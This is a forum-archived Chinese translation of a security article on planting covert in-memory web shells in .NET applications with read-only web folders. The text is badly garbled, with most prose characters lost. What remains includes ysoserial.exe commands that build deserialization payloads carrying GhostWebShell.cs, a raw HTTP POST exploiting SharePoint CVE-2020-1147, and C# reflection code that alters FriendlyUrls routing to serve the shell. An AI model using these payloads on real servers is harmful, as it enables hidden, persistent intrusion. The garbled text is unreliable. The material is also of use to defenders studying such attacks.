[1136] 2020-10-17_[翻译].NET在只读WEB目录中创建内存shell

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-16
2020-10-17_[翻译].NET在只读WEB目录中创建内存shell [ ] . N E T W E B s h e l l S o r o u s h   D a l i l i   C h a B u g   2 0 2 0 - 1 0 - 1 7 S o r o u s h   D a l i l i h t t p s : / / w w w . m d s e c . c o . u k / 2 0 2 0 / 1 0 / c o v e r t - w e b - s h e l l s - i n - n e t - w i t h - r e a d - o n l y - w e b - p a t h s / Y 4 e r   S h a r e P o i n t C V E - 2 0 2 0 - 1 1 4 7 E D R W e b   S h e l l S h a r e P o i n t I U S R C V E - 2 0 2 0 - 1 1 4 7 W e b W e b   S h e l l p o w e r s h e l l . n e t W e b W e b   S h e l l W e b 1 . 使 使 C W e b   S h e l l 使 W e b   S h e l l . N E T H T M L C C 使 便 A S P X   W e b   S h e l l C W e b   S h e l l W e b   S h e l l H T T P U R L W e b   S h e l l H T T P C o o k i e a s p n e t _ c o m p i l e r
便 J a v a S c r i p t H T T P 使 B u r p   S u i t e W e b   S h e l l W e b   S h e l l H T T P H T T P 使 W e b   S h e l l 使 H T T P H T T P U R L H T T P 使 W e b   S h e l l 使 H T T P 使 W e b   S h e l l H T T P W e b   S h e l l W e b   S h e l l W e b 2 . N E T 使 . N E T 便 . N E T . a s p x . s v c . a s h x . a s m x 使 S h a r e P o i n t 使   h t t p s : / / w w w . m d s e c . c o . u k / 2 0 2 0 / 0 3 / a - s e c u r i t y - r e v i e w - o f - s h a r e p o i n t - s i t e - p a g e s /   W e b   S h e l l Y S o S e r i a l . N e t G h o s t W e b S h e l l . c s   W e b   s h e l l 使 W e b   S h e l l b a s e - 6 4 W e b   S h e l l 使 使 Y S o S e r i a l . N e t . y s o s e r i a l . e x e   - g   A c t i v i t y S u r r o g a t e S e l e c t o r F r o m F i l e   - f   L o s F o r m a t t e r   - c   " C : C o o l T o o l s y s o s e r i a l . n e t E x p l o i t C l a s s G h o s t W e b S h e l l . c s ; S y s t e m . d l l ; S y s t e m . W e b . d l l ; S y s t e m . D a t a . d l l ; S y s t e m . X m l . d l l ; S y s t e m . R u n t i m e . E x t e n s i o n s . d l l " w e b s h e l l C o n t e n t s B a s e 6 4 w e b s h e l l T y p e t a r g e t V i r t u a l P a t h L o s F o r m a t t e r
使 便 . N E T   F r a m e w o r k 使 C V E - 2 0 2 0 - 1 1 4 7 S h a r e P o i n t W e b   S h e l l 1 P O S T   / _ l a y o u t s / 1 5 / q u i c k l i n k s . a s p x ? M o d e = S u g g e s t i o n   H T T P / 1 . 1 u t h o r i z a t i o n :   [ n t l m   a u t h   h e a d e r ] C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d H o s t :   [ t a r g e t ] C o n t e n t - L e n g t h :   [ l e n g t h   o f   b o d y ] _ _ V I E W S T A T E = & _ _ S U G G E S T I O N S C A C H E _ _ = [ D a t a S e t   p a y l o a d   f r o m   Y S o S e r i a l . N e t ] 2 . N E T   F r a m e w o r k   v 4 . 8   + . y s o s e r i a l . e x e   - p   S h a r e P o i n t   - - c v e   C V E - 2 0 2 0 - 1 1 4 7   - g   A c t i v i t y S u r r o g a t e D i s a b l e T y p e C h e c k   - c   " i g n o r e d " 3 W e b   S h e l l . y s o s e r i a l . e x e   - p   S h a r e P o i n t   - - c v e   C V E - 2 0 2 0 - 1 1 4 7   - g   A c t i v i t y S u r r o g a t e S e l e c t o r F r o m F i l e   - c   " C : G i t H u b R e p o s m y y s o s e r i a l . n e t E x p l o i t C l a s s G h o s t W e b S h e l l . c s ; S y s t e m . d l l ; S y s t e m . W e b . d l l ; S y s t e m . D a t a . d l l ; S y s t e m . X m l . d l l ; S y s t e m . R u n t i m e . E x t e n s i o n s . d l l " A c t i v i t y S u r r o g a t e D i s a b l e T y p e C h e c k A c t i v i t y S u r r o g a t e S e l e c t o r F r o m F i l e D a t a S e t D a t a S e t A c t i v i t y S u r r o g a t e S e l e c t o r
G h o s t W e b S h e l l . c s 便   M i c r o s o f t . A s p N e t . F r i e n d l y U r l s . N E T   4 . 5 W e b 使 F r i e n d l y U r l s A S P X 使 U R L   . a s p x s h e l l 使 W e b f o r e a c h ( v a r   r o u t e   i n   S y s t e m . W e b . R o u t i n g . R o u t e T a b l e . R o u t e s ) {         i f   ( r o u t e . G e t T y p e ( ) . F u l l N a m e   = =   " M i c r o s o f t . A s p N e t . F r i e n d l y U r l s . F r i e n d l y U r l R o u t e " )   {                 v a r   F r i e n d l y S e t t i n g   =   r o u t e . G e t T y p e ( ) . G e t P r o p e r t y ( " S e t t i n g s " ,   S y s t e m . R e f l e c t i o n . B i n d i n g F l a g s . I n s t a n c e   |   S y s t e m . R e f l e c t i o n . B i n d i n g F l a g s . P u b l i c ) ;                 v a r   s e t t i n g s   =   n e w   M i c r o s o f t . A s p N e t . F r i e n d l y U r l s . F r i e n d l y U r l S e t t i n g s ( ) ;                 s e t t i n g s . A u t o R e d i r e c t M o d e   =   M i c r o s o f t . A s p N e t . F r i e n d l y U r l s . R e d i r e c t M o d e . O f f ;                 F r i e n d l y S e t t i n g . S e t V a l u e ( r o u t e ,   s e t t i n g s ) ;                 } } G h o s t W e b S h e l l . c s I s P a t h V i r t u a l M i c r o s o f t . A s p N e t . F r i e n d l y U r l s . d l l
. N E T 使 Y S o S e r i a l . N e t G h o s t W e b S h e l l . c s 使 W e b   S h e l l W e b 使 W e b W e b W e b   S h e l l W e b   S h e l l 访 . N E T C : W i n d o w s M i c r o s o f t . N E T F r a m e w o r k 6 4 | F r a m e w o r k v [ v e r s i o n ] T e m p o r a r y   A S P . N E T   F i l e s [ a p p n a m e ] [ h a s h ] [ h a s h ] . N E T C W e b   S h e l l W e b   S y s t e m . W e b . C o m p i l a t i o n . B u i l d M a n a g e r . I s P r e c o m p i l e d A p p

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则